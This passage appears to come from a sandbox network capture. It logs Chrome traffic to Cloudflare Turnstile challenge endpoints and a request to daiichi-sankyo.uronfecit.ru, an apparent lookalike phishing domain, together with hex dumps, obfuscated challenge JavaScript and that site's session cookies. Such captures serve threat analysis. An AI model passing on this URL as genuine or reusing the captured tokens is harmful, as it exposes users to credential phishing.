                                        2025-01-07 08:16:23 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.449757104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:24 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:24 UTC240INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:24 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8fe28167ac041780-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.449758104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:24 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2815f5f9a43d9&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:24 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:24 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 111438
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe28168c9c841f8-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:24 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                        2025-01-07 08:16:24 UTC1369INData Raw: 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25
                                        Data Ascii: Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","testing_only":"Testing%20only.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%
                                        2025-01-07 08:16:24 UTC1369INData Raw: 66 58 2c 66 59 2c 67 32 2c 67 33 2c 67 36 2c 67 37 2c 67 44 2c 67 48 2c 67 34 2c 67 35 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 34 39 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 30 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 38 32 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 37 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 32 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 37 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 30 29
                                        Data Ascii: fX,fY,g2,g3,g6,g7,gD,gH,g4,g5){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1130))/1+parseInt(gI(449))/2+parseInt(gI(880))/3+parseInt(gI(582))/4*(parseInt(gI(1387))/5)+-parseInt(gI(1372))/6+parseInt(gI(697))/7+-parseInt(gI(1100)
                                        2025-01-07 08:16:24 UTC1369INData Raw: 34 32 33 29 5d 28 6b 5b 67 4d 28 36 36 38 29 5d 29 2c 6b 26 26 28 4a 2e 69 64 3d 6c 29 2c 6d 26 26 4a 5b 67 4d 28 39 31 39 29 5d 5b 67 4d 28 31 35 33 39 29 5d 28 6e 29 2c 6f 26 26 28 4a 5b 67 4d 28 39 32 34 29 5d 5b 67 4d 28 33 36 35 29 5d 3d 73 29 2c 4a 3b 65 6c 73 65 20 66 6f 72 28 6c 3d 67 4d 28 31 32 31 30 29 5b 67 4d 28 39 38 31 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 3d 6b 5b 67 4d 28 31 33 36 39 29 5d 28 69 2c 67 4d 28 31 31 36 37 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 73 5b 67 4d 28 37 36 38 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6f 3d 65 4f 28 67 5b 67 4d 28 31 32 36 33 29 5d 2c 67 5b 67 4d 28 31 30 36 31
                                        Data Ascii: 423)](k[gM(668)]),k&&(J.id=l),m&&J[gM(919)][gM(1539)](n),o&&(J[gM(924)][gM(365)]=s),J;else for(l=gM(1210)[gM(981)]('|'),m=0;!![];){switch(l[m++]){case'0':n=k[gM(1369)](i,gM(1167));continue;case'1':s[gM(768)]=5e3;continue;case'2':o=eO(g[gM(1263)],g[gM(1061
                                        2025-01-07 08:16:24 UTC1369INData Raw: 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 4e 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 67 4e 28 31 35 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 76 7d 2c 66 5b 67 4e 28 39 31 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 66 5b 67 4e 28 35 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 67 3d 66 2c 67 5b 67 4e 28 31 35 34 38 29 5d 28 65 2c 45 72 72 6f 72 29 29 3f 28 68 3d 65 5b 67 4e 28 36 33 36 29 5d 2c 65 5b 67 4e 28 31 32 37 33 29 5d 26 26 67 5b 67 4e 28 39 31 30 29 5d 28 74 79 70 65 6f 66 20 65 5b 67 4e 28 31 32 37 33 29 5d 2c 67 4e 28 31 36 39 32 29 29 29 26 26 28 6c 3d 65 5b 67 4e 28 31 32 37
                                        Data Ascii: ,k,l,m,n,o){(gN=gJ,f={},f[gN(1548)]=function(s,v){return s instanceof v},f[gN(910)]=function(s,v){return s===v},f[gN(531)]=function(s,v){return s>v},g=f,g[gN(1548)](e,Error))?(h=e[gN(636)],e[gN(1273)]&&g[gN(910)](typeof e[gN(1273)],gN(1692)))&&(l=e[gN(127
                                        2025-01-07 08:16:24 UTC1369INData Raw: 36 34 29 3f 66 72 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 42 29 7b 68 42 3d 68 41 2c 64 5b 68 42 28 31 34 30 35 29 5d 28 68 42 28 33 35 33 29 2c 68 42 28 33 35 33 29 29 3f 64 5b 68 42 28 39 31 39 29 5d 5b 68 42 28 31 35 33 39 29 5d 28 68 42 28 31 34 30 38 29 29 3a 64 5b 68 42 28 31 35 36 33 29 5d 28 66 52 29 7d 2c 31 65 33 29 3a 65 26 26 64 5b 68 41 28 33 37 39 29 5d 28 65 5b 68 41 28 31 33 38 39 29 5d 2c 68 41 28 31 36 32 38 29 29 26 26 65 5b 68 41 28 31 35 34 30 29 5d 3d 3d 3d 68 41 28 31 35 31 33 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 72 29 7d 29 2c 66 74 3d 21 5b 5d 2c 21 65 55 28 67 4a 28 31 35 37 39 29 29 26 26 28 66 52 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 38 2c 63 2c
                                        Data Ascii: 64)?fr=setInterval(function(hB){hB=hA,d[hB(1405)](hB(353),hB(353))?d[hB(919)][hB(1539)](hB(1408)):d[hB(1563)](fR)},1e3):e&&d[hA(379)](e[hA(1389)],hA(1628))&&e[hA(1540)]===hA(1513)&&clearInterval(fr)}),ft=![],!eU(gJ(1579))&&(fR(),setInterval(function(i8,c,
                                        2025-01-07 08:16:24 UTC1369INData Raw: 73 4e 61 4e 2c 6b 3d 63 5b 69 6d 28 33 37 32 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 6d 28 31 30 31 33 29 5d 28 53 74 72 69 6e 67 5b 69 6d 28 31 36 33 38 29 5d 28 28 28 32 35 35 26 6b 29 2d 68 2d 67 25 36 35 35 33 35 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 6d 28 34 39 32 29 5d 28 27 27 29 7d 2c 66 58 3d 7b 7d 2c 66 58 5b 67 4a 28 31 31 31 35 29 5d 3d 27 6f 27 2c 66 58 5b 67 4a 28 31 36 39 32 29 5d 3d 27 73 27 2c 66 58 5b 67 4a 28 31 30 34 32 29 5d 3d 27 75 27 2c 66 58 5b 67 4a 28 31 35 31 39 29 5d 3d 27 7a 27 2c 66 58 5b 67 4a 28 38 39 33 29 5d 3d 27 6e 27 2c 66 58 5b 67 4a 28 31 36 32 30 29 5d 3d 27 49 27 2c 66 58 5b 67 4a 28 31 31 35 31 29 5d 3d 27 62 27 2c 66 59 3d 66 58 2c 65 4d 5b 67 4a 28 31 31 32 32 29 5d 3d 66 75 6e
                                        Data Ascii: sNaN,k=c[im(372)](++g));i[im(1013)](String[im(1638)](((255&k)-h-g%65535+65535)%255)));return i[im(492)]('')},fX={},fX[gJ(1115)]='o',fX[gJ(1692)]='s',fX[gJ(1042)]='u',fX[gJ(1519)]='z',fX[gJ(893)]='n',fX[gJ(1620)]='I',fX[gJ(1151)]='b',fY=fX,eM[gJ(1122)]=fun
                                        2025-01-07 08:16:24 UTC1369INData Raw: 3a 69 77 28 31 33 30 33 29 2c 27 58 58 55 44 54 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 67 4d 73 58 76 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 69 77 28 31 32 34 34 29 5d 28 68 29 2c 6b 3d 30 3b 6b 3c 6a 5b 69 77 28 35 31 30 29 5d 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 27 66 27 3d 3d 3d 6c 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 68 5b 6a 5b 6b 5d 5d 5b 69 77 28 35 31 30 29 5d 3b 69 5b 69 77 28 37 34 31 29 5d 28 2d 31 2c 67 5b 6c 5d 5b 69 77 28 37 35 34 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 26 26 28 69 5b 69 77 28 34 35 33 29 5d 28 67 33 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c
                                        Data Ascii: :iw(1303),'XXUDT':function(n,o){return n===o},'gMsXv':function(n,o){return n(o)}},j=Object[iw(1244)](h),k=0;k<j[iw(510)];k++)if(l=j[k],'f'===l&&(l='N'),g[l]){for(m=0;m<h[j[k]][iw(510)];i[iw(741)](-1,g[l][iw(754)](h[j[k]][m]))&&(i[iw(453)](g3,h[j[k]][m])||
                                        2025-01-07 08:16:24 UTC1369INData Raw: 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 43 51 73 51 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 44 72 57 4c 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 5a 69 46 46 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 6d 45 61 49 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 64 72 57 43 65 27 3a 6a 42 28 37 39 38 29 2c 27 41 69 6b 5a 4f 27 3a 6a 42 28 31 31 37 33 29 2c 27 74 79 69 51 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 63 5a 56 4e 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                        Data Ascii: (h,i){return h<<i},'CQsQd':function(h,i){return i&h},'DrWLe':function(h,i){return h(i)},'ZiFFl':function(h,i){return i!==h},'mEaIG':function(h,i){return h!==i},'drWCe':jB(798),'AikZO':jB(1173),'tyiQU':function(h,i){return i==h},'cZVNC':function(h,i){retur
                                        2025-01-07 08:16:24 UTC1369INData Raw: 2c 50 2c 6a 47 29 7b 72 65 74 75 72 6e 20 6a 47 3d 6a 44 2c 64 5b 6a 47 28 31 31 32 36 29 5d 28 4f 2c 50 29 7d 2c 27 6c 49 73 52 57 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 7c 4f 7d 2c 27 53 6b 7a 56 69 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 48 29 7b 72 65 74 75 72 6e 20 6a 48 3d 6a 44 2c 64 5b 6a 48 28 31 31 39 32 29 5d 28 4f 2c 50 29 7d 2c 27 75 4a 4a 5a 42 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 49 29 7b 72 65 74 75 72 6e 20 6a 49 3d 6a 44 2c 64 5b 6a 49 28 31 31 34 31 29 5d 28 4f 2c 50 29 7d 2c 27 49 6d 51 77 56 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 4a 29 7b 72 65 74 75 72 6e 20 6a 4a 3d 6a 44 2c 64 5b 6a 4a 28 31 31 34 31 29 5d 28 4f 2c 50 29 7d 7d 2c 64 5b 6a 44 28 36 37 33 29 5d 28 6e 75 6c
                                        Data Ascii: ,P,jG){return jG=jD,d[jG(1126)](O,P)},'lIsRW':function(O,P){return P|O},'SkzVi':function(O,P,jH){return jH=jD,d[jH(1192)](O,P)},'uJJZB':function(O,P,jI){return jI=jD,d[jI(1141)](O,P)},'ImQwV':function(O,P,jJ){return jJ=jD,d[jJ(1141)](O,P)}},d[jD(673)](nul


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.449759188.114.96.34433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:24 UTC1342OUTGET /favicon.ico HTTP/1.1
                                        Host: daiichi-sankyo.uronfecit.ru
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: XSRF-TOKEN=eyJpdiI6ImV4S3YvNFBDL29ibHRaUHpjZjY4dVE9PSIsInZhbHVlIjoiOW4zaXdSc2MyQ2FaUGx4SHN6QVdXOU5qRE1CZzlITDY2NGRJdHVMSmMxNmJFNHViUDFYaldOSHdkRzNWQ2I0eVA2TE9TRXg3c2Q0Q0lyQzZaNlNyY0tjQVBuYXNKWkNFc20xcFZDRCtYd0NTMk9QcHFaUklYalRWaEZQSzErVmkiLCJtYWMiOiIwNWY5NjI4Mjg5Mjk1ZDQ2OGRkMTI1OWEzNzU0MzVjMTFmNzM4NmRlNmI0Y2M0NmE1ZWFkOWQ1ZDM1ZjdmNDNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im5EQ1k2MmFObUttUSt6TVNZMUJnV2c9PSIsInZhbHVlIjoielcvOVQ3MUJVVjVSNUxIQUNMdUpXbjNrNzFLNG02Q3RINm1IZlZRUExQUVJFN0E4YXZCNVdBZllyZDRWaHMvR2tmLzJIVXIrSVVWTStnbjZXZXMyaTdLVHNZaTY0WTRRNWNpa08xTVMzcnZXK09jSG1HWW1kUDVlaGZZSkYvZEkiLCJtYWMiOiI1ZWJkMDA0YzhiYTJkNTU0NTQzZjQ5NWM0ZDViZWQ5MDJlYTdhMzNjNDc2YzQyYmMxNGU5MjgwMmMzYjk3ZjFhIiwidGFnIjoiIn0%3D
                                        2025-01-07 08:16:24 UTC1054INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 08:16:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=14400
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HShHOmDE2cG2wPAdvpVo1Z2m6SGLFNB%2BhtkPKnuiYY4QBF2ZCkRSUDMaxN3NFYQxn4FZHdiMZK8OBo1us8fgfBdpVmt7vrdVfRuNdgZ01%2BbePtjkxpHJmd10mOxhUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Vary: Accept-Encoding
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1388&min_rtt=1371&rtt_var=400&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2253&delivery_rate=2014144&cwnd=251&unsent_bytes=0&cid=d8aa1b082f1d8600&ts=19&x=0"
                                        CF-Cache-Status: MISS
                                        Server: cloudflare
                                        CF-RAY: 8fe28168fb1c8cb7-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1937&rtt_var=750&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1920&delivery_rate=1437007&cwnd=168&unsent_bytes=0&cid=ce9fb820d8bca080&ts=347&x=0"
                                        2025-01-07 08:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.449760104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:24 UTC1169OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 3214
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:24 UTC3214OUTData Raw: 76 5f 38 66 65 32 38 31 35 66 35 66 39 61 34 33 64 39 3d 4b 76 79 65 4f 65 68 65 43 65 6c 65 4a 61 31 63 61 31 49 65 61 77 47 4d 62 58 61 54 31 62 70 34 31 6e 49 31 33 2d 41 33 63 67 62 31 47 77 62 4d 35 41 67 68 31 49 31 79 77 61 66 33 56 31 50 41 31 4d 35 5a 66 65 54 35 31 78 65 61 35 66 61 64 48 36 33 66 31 51 65 48 48 46 31 71 41 31 43 71 31 79 77 33 6e 31 62 32 25 32 62 68 31 67 77 61 42 76 65 67 6f 6f 35 31 4b 4f 58 31 37 31 36 68 53 69 32 65 33 77 7a 76 46 4f 77 57 41 56 64 31 57 58 50 75 34 63 36 67 31 48 58 58 41 77 59 35 32 32 2d 76 72 4e 43 76 53 39 2d 63 6e 4a 79 41 41 4a 4b 49 50 64 57 54 50 41 31 59 31 62 4b 4c 61 37 4b 2b 50 41 33 49 54 31 31 4b 74 77 31 73 72 77 31 4c 6a 30 79 73 31 61 50 72 72 77 52 68 65 31 73 2b 2b 2d 52 56 61 52 4d 31
                                        Data Ascii: v_8fe2815f5f9a43d9=KvyeOeheCeleJa1ca1IeawGMbXaT1bp41nI13-A3cgb1GwbM5Agh1I1ywaf3V1PA1M5ZfeT51xea5fadH63f1QeHHF1qA1Cq1yw3n1b2%2bh1gwaBvegoo51KOX1716hSi2e3wzvFOwWAVd1WXPu4c6g1HXXAwY522-vrNCvS9-cnJyAAJKIPdWTPA1Y1bKLa7K+PA3IT11Ktw1srw1Lj0ys1aPrrwRhe1s++-RVaRM1
                                        2025-01-07 08:16:24 UTC759INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:24 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 152824
                                        Connection: close
                                        cf-chl-gen: cTH07VXb87LbZqzqmu65j76ucvIJGHI6P0tTEcvKpXXQXZ2yeM94ObEf4yFvj8of/dF3WX8qpyAMcRGLCLcEpTc1Kqo6EUtr9TDP04fNvFgkFAKACes3vvEtvU4nrFliGARUYSQfmJhEnU1del+0bijP06bKS49D3WRaSGbqj7ReK3F/QBeX29Wbi3ngRjx5jbDm8nFBmANwACNsXrdW2gniYT/K2wnpXkgLsXyt5kjw+QXcEYgy1+5rwDrNiSeW4k2NuXtiSe/c9gTgKFQ6b35JMPbxLDCGC5e/wGiVW2+tlPb4ZWdoa7KZBLN09A78GLzm/dv8ZeHu5Is+yr0b1g2Uotb94D+1wvymZL8DQdUF/Y8C20ZissOd4Vl2C4icNRwZcPkXRlayl74TbT3NbdtpGVS7d9CB9y0dSv6fcrr1yl21absaaJV9wbqrvAPY416pPbeVe75giFMLiU34LKIzI3mkB/86I4WGb3vAis9e8fx/iyo7jbbrVg==$UTo/jvBvtuKH1GmP
                                        Server: cloudflare
                                        CF-RAY: 8fe28169ae594370-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:24 UTC610INData Raw: 76 6f 4f 47 77 4c 53 33 6e 37 71 4a 75 73 62 47 30 34 2f 48 6f 4d 65 2f 31 4d 76 50 30 37 71 79 75 35 62 65 77 75 43 72 6e 37 36 79 32 65 57 2b 6f 71 4f 38 7a 75 79 6d 76 4f 4c 4c 76 39 53 77 72 66 4c 6a 31 4d 6a 6c 79 63 7a 4f 2f 62 76 35 75 72 76 4d 35 67 55 4a 42 2f 66 57 31 2b 6a 44 78 51 76 37 38 4f 44 39 37 4f 2f 69 34 66 54 76 36 2f 50 58 42 2b 6f 50 31 67 45 41 37 42 72 7a 2b 77 4c 30 46 41 41 47 2b 43 59 41 49 51 30 6c 2f 69 4c 79 46 52 51 52 4c 67 55 53 42 51 58 7a 47 42 76 36 4b 76 72 37 4f 79 64 46 4f 42 55 39 48 42 55 5a 51 53 41 2f 41 77 30 75 48 44 38 6b 45 45 4e 55 55 31 4d 6f 54 7a 6c 61 56 55 46 52 59 6a 34 2f 59 54 46 62 52 47 59 72 57 56 5a 76 4c 6b 64 51 58 53 56 68 59 30 42 51 51 48 52 79 5a 57 64 61 4f 6b 35 35 66 6a 6c 30 62 44 31
                                        Data Ascii: voOGwLS3n7qJusbG04/HoMe/1MvP07qyu5bewuCrn76y2eW+oqO8zuymvOLLv9SwrfLj1MjlyczO/bv5urvM5gUJB/fW1+jDxQv78OD97O/i4fTv6/PXB+oP1gEA7Brz+wL0FAAG+CYAIQ0l/iLyFRQRLgUSBQXzGBv6Kvr7OydFOBU9HBUZQSA/Aw0uHD8kEENUU1MoTzlaVUFRYj4/YTFbRGYrWVZvLkdQXSVhY0BQQHRyZWdaOk55fjl0bD1
